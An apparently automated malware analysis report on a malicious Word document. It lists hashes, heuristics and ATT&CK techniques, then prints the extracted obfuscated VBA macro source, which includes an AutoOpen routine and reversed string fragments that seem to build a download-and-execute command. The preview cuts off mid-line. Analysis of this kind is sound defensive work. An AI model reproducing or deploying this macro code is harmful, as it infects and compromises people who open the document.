Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6beac24533618207…

MALICIOUS

Office (OLE)

Size: 148.0 KB
Created: 2018-05-15 18:33:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: b326b14d89ef0c0b3a99887b821e9266
SHA-1: c053af0404dcbcb12dacd9d25282895bf18f4c9f
SHA-256: 6beac24533618207050fa04ad0eb9e28dec117b0dd5418ac58614c1862931bf4
Risk Score: 142

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The critical heuristic that fired indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or to download and run additional payloads. The AutoOpen macro further indicates an attempt at immediate execution when the document is opened. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics (5)

  • VBA macros detected — severity: medium — 2 related findings — OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA — severity: critical — OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro — severity: high — OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker — severity: medium — OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL — severity: info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 118087 bytes
SHA-256: 36bd199c6b429ed4d5494b53cdc82f90d6495a84b8223f71dc6a88e44a0b27c2
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "qIsjsUf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GzZBl(wLBst)
GormpC = RPAUdW
tHWHqD = dKppzT
URRSod = KzTNwS + Sgn(77525 - FdviK - ppuCp + Fix(87227)) - 55766 - CDbl(58107)
wpiMw = 95569
End Sub
Sub BpsfjJ(urlzV)
MuVJL = cXQzkT
vWYPFr = WbGli
jnzKDt = ZpCTY + Sgn(476 - VLlpI - CNfWb + Fix(61625)) - 15119 - CDbl(21753)
knjiYz = 78759
FwqLG = UEqFa
LqQdTk = HdjXm
rFOjtb = jnjtR + Sgn(237 - HLRlah - WuXGL + Fix(78413)) - 62716 - CDbl(64386)
WYEPPA = 10698
wiIIY = WLSoL
MwwEZV = qdiml
tKUNkh = FwowZ + Sgn(28090 - jBvsAV - hYcAqt + Fix(80045)) - 28236 - CDbl(83708)
rXIfA = 2860
End Sub
Sub iHEqPJ(fKXbp)
plQNLl = NunQrF
EBFSj = zKtQvS
bUfWO = JZFGu + Sgn(38943 - IkoTo - KkwdEF + Fix(84367)) - 79666 - CDbl(70500)
szSsXR = 85701
RCRvA = uKwVrM
ZcwIi = raRWjZ
NHcbqr = aClhOk + Sgn(96320 - uGWwYJ - XWktl + Fix(2659)) - 76846 - CDbl(487)
iWFkni = 43703
End Sub
Sub Autoopen()
On Error Resume Next
zTvXqO = thIjKz
AlvjFr = FqmCFz
iNuLks = ENuhHq + Sgn(99597 - sHqjw - UpEdf + Fix(64052)) - 87055 - CDbl(55549)
VlPCP = 37777
sOBlwwww (UaHmw + AHmRQqZDIRTn + ACzAz)
wiMYC = KYpiE
FbEZv = nklimP
KZwoC = ijsiiJ + Sgn(24836 - jEvYm - wjUTb + Fix(12275)) - 10129 - CDbl(24892)
PTrwz = 85758
End Sub
Sub OjnDZa(zZPif)
jpGAu = dFcMwa
XcKnN = UlqMk
vVSXuM = ZFjaN + Sgn(83450 - WPqlW - dHDlmm + Fix(3798)) - 40930 - CDbl(21650)
qdVRw = 13411
iiAYA = rBzvL
FuEptG = RhkIKC
jqwsa = PEHDW + Sgn(36029 - vMjpqq - GblobL + Fix(20222)) - 78838 - CDbl(56170)
aqWlcA = 10088
VIaAm = TadsF
vRTXII = IQOsa
KdfwqT = ikUiD + Sgn(10376 - kVBhSj - BIWwdT + Fix(93339)) - 94033 - CDbl(77919)
PAZcY = 75676
End Sub
Sub mYtTKw(UDUUnP)
arvIUJ = NzPhwO
DfLLh = vtpMr
kiazc = ZZpId + Sgn(37975 - djZYi - OiTQXI + Fix(15901)) - 10655 - CDbl(85306)
jBjRIZ = 37486
End Sub

Attribute VB_Name = "AmXWpduCsHEq"
Sub VLacd(NDrUE)
nIHtCv = MmYrO
tpVUQA = BQLqJ
iIFjIS = pBVnI + Sgn(80668 - zdjwT - kkbri + Fix(51433)) - 38116 - CDbl(4924)
WzRjMQ = 92658
End Sub
Function AHmRQqZDIRTn()
On Error Resume Next
DPZuC = UiLanB
hPWzF = jNAiwR
fYVYd = DWjjuR + Sgn(65127 - GJWAjA - phumH + Fix(42649)) - 29507 - CDbl(87767)
hadrM = 93196
MvYsTi = jdPKZ
LWMvR = ibFdjz
nASUS = NSPRHj + Sgn(64632 - YZjsR - zGGEL + Fix(74897)) - 81778 - CDbl(63552)
GSrvL = 82842
IFBwIFzDm = mjTjPa("5QqZz:p'+'tth@/s5'+'5q'+'Jm/ed'+'.zlas-'+'vdejE", 24806 + 3 - 24806, 24806 + 40 - 24806)
QJwhM = vFEMkq
BYlOl = htOIj
jvIzPn = LOIXv + Sgn(70274 - AKBzzC - aVihdJ + Fix(5802)) - 19210 - CDbl(31654)
AQufD = 74763
XNaSj = jtTLGH
uqooEi = Dlpaj
wnCiT = PmWPT + Sgn(39741 - REZqmq - BtciJo + Fix(83178)) - 54867 - CDbl(7413)
YzjYtv = 81589
luNsJXMmMEW = mjTjPa("7I7]rAHc[+38]rAHc[(  EcALPErc-)'}}{h'S2z,", 11607 + 5 - 11607, 11607 + 35 - 11607)
srstYa = UHQGd
DjlGFL = ViXmj
rUlYYJ = BuzFHV + Sgn(2620 - phbWa - VPzRnj + Fix(41246)) - 37186 - CDbl(26299)
FKojA = 67106
vPJKu = EQLWdC
pkZjR = jRNSJz
DDVXo = WfOLw + Sgn(42739 - TniOb - obDZAn + Fix(41667)) - 64132 - CDbl(37674)
hzzNVj = 2463
nipwBsDWP = mjTjPa("OBoc))93]rAHc[,)47]rAHc[+35]rAHc[+94]rAHc[(ecaLper-29]rAHc[,'fsoDADsc", 66983 + 6 - 66983, 66983 + 60 - 66983)
nhEfVa = dNLjt
zraIwA = UkTrCw
OwIlnm = atfJGd + Sgn(563 - aKBav - GZEXjW + Fix(52033)) - 6462 - CDbl(28614)
cYsKj = 8375
idYwj = qojWZ
cvHpD = VXEWGi
qPDBQA = nURXuc + Sgn(73920 - vzaRz - hNiKo + Fix(24788)) - 25823 - CDbl(51549)
IXqLp = 89647
FUuucaUiiu = mjTjPa("hF+'cta'+'c}'+';k'+'a'+'erb;)'+'C'+'DSAk4()'+'J51'+'me'+'tI-eJ51+J51kJ51+'+'J5'+'1ovnIJ51(&'+';)CDS'+'A'+'k4 ,'+')(DN'+'SgN5ZPi5'+'Z'+'PrtSoTDNS3%73", 49734 + 5 - 49734, 49734 + 142 - 49734)
nPVwjH = jvbzVb
vojbJ = VrcoP
CJAER = FILKwC + Sgn(53343 - iwPNN - zMMjHj + Fix(61883)) - 85966 - CDbl(32159)
nhhXFV = 68875
VzUnz = zJKuEp
dbXZFp = OOpjT
QOpQct = sYfSP + Sgn(52465 - QTBALR - ajtUb + Fix(62786)) - 18079 - CDbl(21600
... (truncated)